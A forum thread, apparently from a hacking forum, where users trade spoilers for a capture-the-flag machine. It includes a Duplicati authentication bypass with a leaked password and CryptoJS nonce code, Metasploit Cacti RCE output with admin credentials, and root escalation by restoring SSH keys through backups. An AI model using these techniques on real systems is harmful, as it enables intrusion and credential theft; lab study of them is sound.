Posts: 60
Threads: 18
Joined: Jul 2024
(Aug 25, 2024, 09:36 AM)rootme1122 Wrote: (Aug 25, 2024, 09:34 AM)f4k3h4ck3r Wrote: (Aug 25, 2024, 06:09 AM)humanai Wrote: (Aug 25, 2024, 04:38 AM)f4k3h4ck3r Wrote: (Aug 25, 2024, 04:34 AM)0x404 Wrote: It didn't work here either =\
console.log(CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("r5Xf9war2EPduVIifCAVQqsUOcYLnSPpYFfW9LGONEA=")+"59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a")).toString(CryptoJS.enc.Base64));
This also did not worked
This looks correct, make sure you use the correct nonce for your session
Everything was correct but still did not worked for me
same here Login failed: Unauthorized
yeah, i don't know why is happening to me
Posts: 41
Threads: 1
Joined: Jun 2024
try using msf6 exploit(multi/http/cacti_package_import_rce) and linux/local/su_login in metasploit. it will work This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 42
Threads: 2
Joined: Aug 2024
If anyone still struggles with the bypass for duplicati, here is the Password:
MonitorsThreeDuplicatiBackupPassword2024
For Priv-Esc (not just the root-flag, but shell as root):
Enable run-script-before on settings and set its Path to:
Duplicati is running in docker the / is mounted on /source
Create /tmp/script.sh and put in your method of escalation (either reverseshell, or writen an ssh-key on /root/.ssh/authorized_keys) or simply chmod +s on /usr/bin/bash
afterwards run the cacti-backup on "Home" --> "run now"
Posts: 3
Threads: 0
Joined: Jul 2024
for anyone wondering... I went from www-data to capturing root flag with no priv-esc inbetween.
once you have www-data shell, just chisel 8200, bypass duplicati auth with the medium guide, and create a backup for /sources/home/ and /sources/root.
the generated aes.zip files contain all files and folders for marcus and root. use sharpaescrypt to decrypt
Posts: 32
Threads: 1
Joined: Aug 2024
i think it should be clear what to do. But if you need details i did it like that:
on my kali: ssh-keygen -t rsa -b 4096 -f monitors
copy monitors.pub as authorized_keys to /home/marcus
in duplicati new backup - name for example TEST
destination to /source/tmp/test1
disable encrypting
source to /source/home/marcus/authorized_keys
disable automate backup
save and run backup
then restore from TEST
choose authorized_keys
destination choose /source/root/.ssh/
choose overwrite
run
I am confused on the part
then restore from TEST
choose authorized_keys
can this be explained?
I have created the backup , my key is in /home/marcus
Posts: 26
Threads: 0
Joined: May 2024
(Aug 25, 2024, 08:58 AM)aasdawejkasjdkasd Wrote: Yeah what guy above said. Make sure you're going into /source, that's where the system files are. For example, /root/root.txt doesn't exist, it's /source/root/root.txt
So you create a backup of the flag and store it on /source/tmp/test for example. Then you restore that backup and set the destination folder to another directory which you can access and you'll see the files there.
I'm not sure how you guys got marcus first... I got the www-data shell, used chisel to portforward duplicati and got root. Password and ssh wasn't working for marcus. I actually used duplicati to get marcus's id_rsa, but that was dumb and then I did the same for root
(Aug 25, 2024, 08:57 AM)Eggsy Wrote: ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 id_rsa
marcus@10.10.11.30: Permission denied (publickey).
anyone can help me with this?
Missing -i before id_rsa bro just su marcus inside the www/data This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 49
Threads: 1
Joined: Jun 2024
Aug 25, 2024, 10:51 AM
(This post was last modified: Aug 25, 2024, 10:51 AM by bmoon10.)
(Aug 25, 2024, 09:36 AM)rootme1122 Wrote: (Aug 25, 2024, 09:34 AM)f4k3h4ck3r Wrote: (Aug 25, 2024, 06:09 AM)humanai Wrote: (Aug 25, 2024, 04:38 AM)f4k3h4ck3r Wrote: (Aug 25, 2024, 04:34 AM)0x404 Wrote: It didn't work here either =\
console.log(CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("r5Xf9war2EPduVIifCAVQqsUOcYLnSPpYFfW9LGONEA=")+"59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a")).toString(CryptoJS.enc.Base64));
This also did not worked
This looks correct, make sure you use the correct nonce for your session
Everything was correct but still did not worked for me
same here Login failed: Unauthorized
if you've followed these steps so far then before pasting the console.log password into burp password request intercept window do url encode the password
for e.g
console.log output will be something like this.
uTQDw/x0nVjb5aAyVcv0vdtGpCJ8Nmxxxxxxxxxxxx=
url encoded version
uTQDw%2Fx0nVjb5aAyxxxxxxxxxxCJ8NmRQXZEWda2p8LM%3D
this will help you with the login page
Posts: 5
Threads: 0
Joined: Aug 2024
(Aug 25, 2024, 08:35 AM)jsvensson Wrote: (Aug 25, 2024, 07:58 AM)test888 Wrote: (Aug 25, 2024, 07:48 AM)jsvensson Wrote: for those who have trouble bypassing duplicati authentication
in burp you do intercept send login do forward copy session_nonce to noncedpwd command - substitute result to password - forward and then disable intercept
for getting shell as root:
generate ssh keys on your box - copy public key to some folder on box as authorized_keys, in duplicati create backup to backup this file and then restore it to /source/root/.ssh/ - now you should be able login with generated key as root
What are your steps to create the backup?
i think it should be clear what to do. But if you need details i did it like that:
on my kali: ssh-keygen -t rsa -b 4096 -f monitors
copy monitors.pub as authorized_keys to /home/marcus
in duplicati new backup - name for example TEST
destination to /source/tmp/test1
disable encrypting
source to /source/home/marcus/authorized_keys
disable automate backup
save and run backup
then restore from TEST
choose authorized_keys
destination choose /source/root/.ssh/
choose overwrite
run
then just do ssh root@ip -i file_with_key
(Aug 25, 2024, 08:31 AM)teky Wrote: this nonce shit is so frustrating
it's rather easy just do it with steps:
1. intercept in burp
2. login with some pass
3. forward login
4. copy session-nonce and decode it from url
5. put it in var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("your_nonce") + saltedpwd)).toString(CryptoJS.enc.Base64);
6. copy noncedpwd to password in intercepted request
7. forward
8. stop intercepting
you should be logged
I'm glad to hear I was on the right track here earlier but this still wasn't working for me earlier... when I try to execute in browser to get the pass it simply states saltpwd isn't defined.
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("9CZs1OZ3xYWKnue71Qr3FYaxqc......") + saltedpwd)).toString(CryptoJS.enc.Base64);
Uncaught ReferenceError: saltedpwd is not defined
<anonymous>
Posts: 2
Threads: 1
Joined: Jul 2024
msf6 exploit(multi/http/cacti_package_import_rce) > run
[*]Started reverse TCP handler on 10.10.14.4:4444
[*]Running automatic check ("set AutoCheck false" to disable)
[*]Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*]Attempting login with user `admin` and password `greencacti2001`
[+] Logged in
[*]Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*]Uploading the package
[-] Exploit aborted due to failure: unreachable: Could not connect to the web server - no response when sending the preview import request
[*]Exploit completed, but no session was created.
I get this error... Can somebody help me?
Posts: 16
Threads: 0
Joined: Jul 2024
(Aug 24, 2024, 10:49 PM)drunkp Wrote: [quote="hexforce" pid='779647' dateline='1724538401']
Found out that you can bypass auth since you have access to the duplicati db in /opt/duplicati ... I didnt manage to get the exploit to work yet, but could lead to user?
/opt/duplicati doesn't contain dbs
Yes it does you absolute twat
|
